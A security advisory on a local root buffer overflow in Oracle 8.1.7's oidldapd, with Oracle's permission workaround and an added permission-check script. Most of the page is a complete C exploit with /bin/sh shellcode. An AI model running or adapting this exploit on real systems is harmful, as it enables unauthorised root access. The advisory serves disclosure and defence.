Vulnerability: Oracle (oidldapd)

Affected: Oracle 8.1.7

Description

The following is based on a Plazasite System & Security Division Security Advisory by Juan Manuel Pascual.

oidldapd is the Oracle Internet Directory (OID) LDAP daemon. The current version is 2.1.1.1. There is a buffer overflow in oidldapd that local users can use to obtain the effective UID of root. This is easiest for the oracle user, but any user with local access can gain euid=root.

/*
 * Exploit code for oidldapd in Oracle 8.1.7 (8i R3) for Linux.
 * Tested on RH 6.2 and 6.1.
 *
 * synopsis: buffer overflow in oidldapd
 * impact:   any local user gains euid=root
 *
 * Dedicated to my mentors, Cra & Borja. Thanks for your knowledge and wisdom.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy */

#define DEFAULT_OFFSET      -400
#define DEFAULT_BUFFER_SIZE  700
#define NOP                  0x90
#define ORACLE_HOME          "/work/oracle8ir3"

/* Linux/x86 execve("/bin/sh") shellcode */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer (left in %eax as the return value). */
unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr, *name[3], environ[100], binary[120];
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;

    buff = malloc(bsize);
    addr = get_sp() - offset;

    /* Fill the whole buffer with the guessed return address... */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* ...then a NOP sled over the first half, with the shellcode in the middle. */
    for (i = 0; i < bsize / 2; i++)
        buff[i] = NOP;
    ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';

    /* The payload is passed through the environment (EGG) and reaches
     * oidldapd through its connect= argument. */
    memcpy(buff, "EGG=", 4);
    putenv(buff);
    sprintf(environ, "ORACLE_HOME=%s", ORACLE_HOME);
    putenv(environ);
    sprintf(binary, "%s/bin/oidldapd connect=$EGG", ORACLE_HOME);
    system(binary);
    return 0;
}

Solution

Oracle recommends that customers implement the following workaround: change the file permissions to 710 on the 'oidldapd' and 'oidmon' executables.
These permissions will limit access (to the executables) to a small, privileged group of users on the host machine. Oracle has comprehensively fixed these vulnerabilities in the OID 2.0, Release 2.0.6.3, patch set on Solaris and in the forthcoming OID 2.1, Release 2.1.1.1, patch set. The OID 2.0.6.3 patch set is available on Metalink, Oracle's Support Services site. Oracle intends to produce this patch on additional platforms as well.
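A check for the workaround above, added here as an example and not part of the advisory or of Oracle's tooling. It assumes ORACLE_HOME points at the installation; the two executable names are the ones the advisory gives, and the check accepts 710 or anything more restrictive.

```shell
#!/bin/sh
# Added example (not from the advisory): verify that the OID executables are
# not reachable by "other" users, which is what Oracle's 710 workaround does.

# Print a file's permission bits in octal (GNU stat first, BSD stat fallback).
perm_octal() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Return 0 when the file exists, its "other" bits are all clear and it is not
# group-writable (mode 710 or stricter); return 1 otherwise.
workaround_applied() {
    f=$1
    [ -e "$f" ] || return 1
    mode=$(perm_octal "$f")
    # Keep the lowest three digits; this drops a leading setuid/setgid digit.
    low=$(printf '%s' "$mode" | tail -c 3)
    group=$(printf '%s' "$low" | cut -c2)
    other=$(printf '%s' "$low" | cut -c3)
    [ "$other" = "0" ] && [ "$((group & 2))" -eq 0 ]
}

# Report on the two executables named in the advisory; non-zero if any fails.
check_oid_binaries() {
    rc=0
    for name in oidldapd oidmon; do
        f="$ORACLE_HOME/bin/$name"
        if workaround_applied "$f"; then
            echo "OK   $f mode $(perm_octal "$f")"
        else
            echo "FAIL $f mode $(perm_octal "$f" 2>/dev/null) (expected 710)"
            rc=1
        fi
    done
    return $rc
}
```

Run `check_oid_binaries` after applying the chmod; a FAIL line means the executable is still world-accessible or group-writable.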